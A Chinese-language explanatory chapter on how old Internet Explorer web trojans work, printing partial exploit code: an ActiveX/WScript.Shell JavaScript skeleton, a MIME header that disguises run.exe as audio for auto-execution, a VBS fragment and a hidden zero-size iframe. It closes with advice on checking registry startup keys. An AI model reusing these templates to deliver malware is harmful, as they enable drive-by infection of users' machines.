第二章 网页病毒、网页木马机理深度剖析

第一节 网页病毒、网页木马的制作方式

Ⅰ.Javascript.Exception.Exploit

利用JS+WSH的完美结合，来制作恶意网页的方法几乎是所有恶意站点必有的“功能”。

Ⅱ. 错误的MIME Multipurpose Internet Mail Extentions，多用途的网际邮件扩充协议头.

几乎是现在网页木马流行利用的基本趋势，这个漏洞在IE5.0到IE6.0版本中都有，对这么一个全能的漏洞，大家怎能不重视?

Ⅲ..EXE to .BMP + Javascritp.Exception.Exploit

具体的.EXE转化到.BMP的文章我想大家都见到过，而且不只一次。应用方法很简单:诱骗浏览者上当。

Ⅳ. iframe 漏洞的利用

当微软的IE窗口打开另一个窗口时，如果子窗口是另一个域或安全区的话，安全检查应当阻止父窗口访问子窗口。但事实并非如此，父窗口可以访问子窗口文档的frame，这可能导致父窗口无论是域或安全区都能在子窗口中设置Frame或iframe的URL。这会带来严重的安全问题，通过设置URL指向javascript协议，父窗口能在子域环境下运行脚本代码，包括任意的恶意代码。攻击者也能在“我的电脑”区域中运行脚本代码。这更会造成严重的后果。

Ⅴ.通过安全认证的CAB,COX

此类方法就是在.CAB文件上做手脚，使证书.SPC和密钥.PVK合法

原理:IE读文件时会有文件读不出，就会去“升级”这样它会在网页中指定的位置找 .cab 并在系统里写入个CID读入.cab里的文件。

方法:.cab是WINDOWS里的压缩文件，我们知道IE里所用的安全文件是用签名的CAB也不例外，所做的CAB是经过安全使用证书引入的。也就是说IE认证攻击，只所以每次都能入侵我的脑，是因为它通过的是IE认证下的安全攻击，这样不管我怎么做都没办法。

Ⅵ.EXE文件的捆绑

现在的网页木马捆绑机几乎是开始泛滥了，多的数不胜数。再将生成的MHT文件进行加密，好，这样一来，连我们最信任的杀毒软件也无效了。

第二节 网页病毒、网页木马的运行机理分析

Ⅰ.Javascript.Exception.Exploit

精华语句:

Function destroy(){

try

{

//ActiveX initialization 初始化ActiveX，为修改注册表做准备

a1=document.applets[0];

//获取applet运行对象，以下语句指向注册表中有关IE的表项

a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Shl = a1.GetObject();

a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");

a1.createInstance();

FSO = a1.GetObject();

a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");

a1.createInstance();

Net = a1.GetObject();

try

{

开始做坏事

}

}

catch(e)

{}

}

catch(e)

{}

}

function do()

{

//初始化函数，并每隔一秒执行修改程序

setTimeout("destroy()", 1000); //设定运行时间1秒

}

Do() //坏事执行函数指令

全部是JS编写，没有什么高深的技术，但它却可以把你的计算机注册表改的是乱78糟，在你的计算机里留下各式各样的垃圾，甚至于连声招呼都不打就G了你的硬盘。所列出的整段函数看起来简单明了，声明函数，初始化环境，取得注册对象，执行读，写，删权限，定义操作时间(快得叫你连反映都没有)。

Ⅱ. 错误的MIME Multipurpose Internet Mail Extentions，多用途的网际邮件扩充协议头.

精华语句:

Content-Type: multipart/related;

type="multipart/alternative";

boundary="====B===="

--====B====

Content-Type: multipart/alternative;

boundary="====A===="

--====A====

Content-Type: text/html;

Content-Transfer-Encoding: quoted-printable

--====A====--

--====B====

Content-Type: audio/x-wav;

name="run.exe"

Content-Transfer-Encoding: base64

Content-ID: ---以下省略AAAAA N+1个---

把run.exe的类型定义为audio/x-wav，这下清楚了，这是利用客户端支持的 MIME(多部

分网际邮件扩展，Multipart Internet Mail Extension) 类型的漏洞来完成的。当申明邮件的类型为audio/x-wav时，IE存在的一个漏洞会将附件认为是音频文件自动尝试打开，，结果导致邮件文件x.eml中的附件run.exe被执行。在win2000上，即使是用鼠标点击下载下来的 x.eml，或是拷贝粘贴，都会导致x.eml中的附件被运行。整个程序的运行还是依靠x.eml这个文件来支持。Content-Transfer-Encoding: base64 Content-ID: 从这我们可以看出，由于定义后字符格式为base64，那么一下的代码全部为加密过的代码，里面可以是任何执行的命令:

〈script language=vbs〉

On Error Resume Next·　容错语句，避免程序崩溃

set aa=CreateObject("Wscript.Shell")·建立Wscript对象

Set fs = CreateObject("scripting.FileSystemObject")·建立文件系统对象

Set dir1 = fs.GetSpecialFolder(0)·得到Windows路径

Set dir2 = fs.GetSpecialFolder(1)·得到System路径

……省略……

下面代码该做什么各位都该清楚吧.这就是为什么很多人中毒后不能准确的清除全部的病毒体的原因，也是很多杀毒软件的一个通病。病毒监控只杀当时查到的，新建的却置之不理。

Ⅲ. iframe 漏洞的利用

㈠

多方便的办法，浏览者的COOKIES就这样轻松的被取走。

㈡

〈iframe src=run.eml width=0 height=0〉〈/iframe〉

常见的木马运用格式，高度和宽度为0的一个框架网页，我想你根本看不到它。除非你的浏览器不支持框架!

㈢

又是一个框架引用的新方式，对type="text/x-scriptlet" 的调整后，就可以实现和eml格式文件同样的效果，更是防不胜防。

Ⅳ. Microsoft Internet Explorer浏览器弹出窗口Object类型验证漏洞 漏洞的利用

精华代码:

----- code cut start for run.asp -----

----- code cut end for run.asp -----

[作者注] 我想，这个方法是现行的大部分木马网页中使用的频率最高的一个。效果绝对是最好的。不管是你IE5.0还是IE6.0还是+SP1补丁的。我们都敢大声的说:IE6.0+SP1也不是万能的。呵呵，是不是想改用mozilla了?

总结:

几乎所有类型的网页病毒都有一个特性，就是再生，如何再生，让我们从注册表中的启动项开始分析:注册表中管理启动的主键键值分别为:

[HKEY_LOCAL_MACHINE /Software /Microsoft /Windows /CurrentVersion /RunServices]

[HKEY_LOCAL_MACHINE /Software /Microsoft /Windows /CurrentVersion

/RunServicesOnce]

[HKEY_LOCAL_MACHINE /Software /Microsoft /Windows /CurrentVersion /Run]

[HKEY_LOCAL_MACHINE /Software /Microsoft /Windows /CurrentVersion /RunOnce]

[HKEY_CURRENT_USER /Software /Microsoft /Windows /CurrentVersion /Run]

[HKEY_CURRENT_USER /Software /Microsoft /Windows /CurrentVersion /RunOnce]

[HKEY_CURRENT_USER /Software /Microsoft /Windows /CurrentVersion　/RunServices]

确认主键下没有加载任何分键值.另外，在启动配置器里的autoexec.bat ,win.ini,system.ini以及在WIN 9X下的winstart.ini文件，其中的存在LOAD=键的，它的值是空，不是空格，只有=号。Autoexec.bat没有加载任何程序，在「开始」菜单/程序/启动 文件夹下不存在任何程序，那样才能有效的去掉一个病毒的再生功能。不叫它开机运行，或者不在运行，那我们就可以把它从计算机上请出去。